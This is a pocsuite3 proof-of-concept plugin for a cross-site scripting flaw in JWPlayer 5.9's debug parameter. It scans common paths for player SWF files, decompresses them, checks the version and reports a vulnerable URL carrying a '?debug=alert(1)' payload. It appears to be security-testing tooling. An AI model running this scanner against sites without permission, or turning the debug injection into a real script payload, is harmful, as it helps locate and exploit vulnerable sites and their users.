JWPlayer 5.9 debug 参数 跨站脚本漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger import struct import zlib import re from urllib import request class DemoPOC(POCBase): vulID = '0882' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2012-05-15' createDate = '2013-01-11' updateDate = '2012-01-11' references = ['http://www.wooyun.org/bugs/wooyun-2010-07166'] name = 'JWPlay 5.9 debug parameter Cross Site Scripting' appPowerLink = 'http://www.longtailvideo.com/' appName = 'JWPlayer' appVersion = '5.9#' vulType = 'Cross Site Scripting' desc = '''反编译player.swf，缺陷存在地方为：com\longtailvideo\jwplayer\\utils\Logger.as。send函数的_config.debug参数没有人过滤， 直接被ExternalInterface.call函数中去执行，ExternalInterface.call执行的是容器中的代码，在这里容器为HTML ， 那么就会去调用JavaScript函数。攻击者可以构造跨站脚本传給_config.debug，最终导致跨站脚本漏洞。 ''' samples = [] install_requires = [''] def parse(self, swf_file): input = swf_file # swf文件名 need_close = False if hasattr(input, 'read'): # input.seek(0) pass else: input = open(input, 'rb') need_close = True def read_ui8(c): return struct.unpack('<B', c)[0] def read_ui16(c): return struct.unpack('<H', c)[0] def read_ui32(c): return struct.unpack('<I', c)[0] header = {} # Read the 3-byte signature field ff = input.read(3) signature = ''.join(map(lambda x:x.decode(), struct.unpack('<3c', ff))) # signature = struct.unpack('<3c',ff) if signature not in ('FWS', 'CWS'): raise ValueError('Invalid SWF signature: %s' % signature) # Compression header['compressed'] = signature.startswith('C') # Version header['version'] = read_ui8(input.read(1)) # File size (stored as a 32-bit integer) header['size'] = read_ui32(input.read(4)) # Payload buffer = input.read(header['size']) if header['compressed']: # Unpack the zlib compression de_buffer = buffer = zlib.decompress(buffer) return de_buffer def _verify(self): payloads = ['/player.swf', '/jwplayer.swf', '/play.swf', '/swf/player.swf'] result = {} for path in payloads: payload = self.url + path try: contentType = requests.get(payload).headers.get("Content-Type") except Exception as e: contentType = '' if contentType == "application/x-shockwave-flash": r = request.urlopen(payload) swf = self.parse(r).decode('utf-8', 'ignore') m = re.findall('_version.*?([\d\.]+)', swf) if m: version = m[0].split('.') if int(version[0]) <= 5 and int(version[1]) <= 9 and "jwplayer" in swf: result['VerifyInfo'] = {} result['VerifyInfo'][ 'URL'] = payload + '?debug=alert(1)' result["VerifyInfo"]['Version'] = m[0] return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)